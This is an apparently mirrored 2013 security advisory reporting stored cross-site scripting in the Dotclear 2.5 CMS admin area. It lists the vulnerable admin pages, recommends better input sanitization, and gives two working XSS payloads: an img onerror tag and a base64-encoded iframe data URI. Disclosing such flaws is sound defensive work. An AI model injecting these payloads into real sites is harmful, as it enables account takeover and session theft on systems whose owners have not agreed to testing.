Dotclear 2.5 Cross Site Scripting

🗓️ 04 Jun 2013 00:00:00Reported by Nikhalesh Singh BhadoriaType

packetstorm🔗 packetstormsecurity.com👁 24 Views

Dotclear 2.5 CMS Cross Site Scripting Vulnerabilities, affecting admin area and input sanitization, with potential for stored cross-site scripting

`Exploit Title: Dotclear 2.5 Cms Cross Site Scripting Vulnerabilities  
# Date: 06/04/2013  
# Author: Nikhalesh Singh Bhadoria  
# Twitter: @nikhaleshsingh  
#Download Link:http://dotclear.org/  
# Versions Affected: Dotclear 2.5.  
# Category:Xss  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Vulnerabilitie Description:  
  
The Vulnerabilities in admin area users options and many other place input in is not sanitized. Therefore it results  
in a stored cross-site scripting  
  
Dotclear Description:  
DotClear was design only for weblogs management, and do it well. It is completely free! DotClear is a free software distributed under the GNU General Public License..  
  
POC:  
http://www.youtube.com/watch?v=3eiEC8MtrpM&feature=youtu.be  
  
Code :-  
########################################################################################################  
"><img src=x onerror=prompt(0);>  
  
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">  
  
http://demo.xxx.com/admin/preferences.php  
http://demo.xxx.com/dotclear/admin/users.php  
  
##########################################################################################################  
Fix:  
Better sanitization by restricting special characters.  
  
Regard's  
Nikhalesh Singh Bhadoria  
Information Security Enthusiast  
Website:Gurunsb.com  
`

04 Jun 2013 00:00Current

7.4High risk

Vulners AI Score7.4